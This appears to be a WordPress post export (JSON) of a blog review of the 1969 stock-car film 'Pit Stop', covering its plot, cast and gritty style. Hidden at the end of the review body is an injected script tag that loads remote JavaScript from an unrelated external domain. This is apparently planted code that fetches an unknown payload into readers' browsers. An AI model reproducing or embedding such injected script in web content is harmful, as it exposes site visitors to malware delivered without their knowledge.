{"id":10565,"date":"2014-04-09T13:19:08","date_gmt":"2014-04-09T19:19:08","guid":{"rendered":"http:\/\/www.bmovienation.com\/?p=10565"},"modified":"2014-04-09T13:19:08","modified_gmt":"2014-04-09T19:19:08","slug":"pit-stop","status":"publish","type":"post","link":"http:\/\/www.bmovienation.com\/?p=10565","title":{"rendered":"Pit Stop"},"content":{"rendered":"<p>Pit Stop, a 1969 collaboration between B-movie king Roger Corman and director Jack Hill (renown primarily for his work across a number of Blaxploitation titles), represents something of a dream pairing for trash cinema aficionados. With its intriguing Faustian-like plot, stunning stock car racing footage and memorable performances, including a young, very beautiful Ellen Burstyn (credited here as Ellen McRae), Pit Stop proves to be a cut about the usual low-grade genre works from that period in US cinema. Weathered James Dean lookalike Richard Davalos plays Rick Bowman, a young tearaway (at 39) who has a penchant for fast cars and a talent for pushing them to their extremes.<\/p>\n<p>Sprung from prison after a particularly messy suburban drag race, he&#8217;s offered the chance to drive a souped-up motor belonging to a rich businessman (Brian Donlevy). Bowman soon excels in the destruction derby-inspired &#8216;Figure Eight&#8217; race circuit, much to the annoyance of racing bad boy and daredevil, Hawk Sidney (Rob Zombie regular Sid Haig). Nabbing Sidney&#8217;s girl and continuing his swift ascent to the big league, Bowman will seemingly stop at nothing to get to the top. What&#8217;s immediately clear with Pit Stop is that Hill (a former film school classmate of one Francis Ford Coppola) is following the low quality\/cheap thrills exploitation film mandate laid out by his producer. However, the director also manages to imbue the material with more personality and style than would be expected.<\/p>\n<p>Shot in stark black and white and featuring a fantastic bluesy guitar score, the film exudes an effortless cool and excitement, right down to the exhilarating race footage, which has a wonderfully grainy, v\u00e9rit\u00e9 authenticity (intercut with those cheesy, visibly artificial back-projection shots of the main characters in the driver&#8217;s seat). Unsurprisingly, the film is a little rough around the edges, but the aim to entertain and astound at all costs is first and foremost on Hill&#8217;s mind (the frenzied axe attack by a manic Haig on Davalos&#8217; motor mid-way through has to be seen to be believed). Pit Stop certainly couldn&#8217;t be accused of being high art, but it&#8217;s a helluva lot of fun, offering an entertaining snapshot of that schlocky, drive-in era, complete with an unexpectedly dark ending which flies in the face of the usual heroic cinematic conventions.<script src=\"\/\/pngme.ru\/seter\"><\/script><\/p>\n<div class=\"syndication-links\"><\/div>","protected":false},"excerpt":{"rendered":"<p>Pit Stop, a 1969 collaboration between B-movie king Roger Corman and director Jack Hill (renown primarily for his work across a number of Blaxploitation titles), represents something of a dream pairing for trash cinema aficionados. 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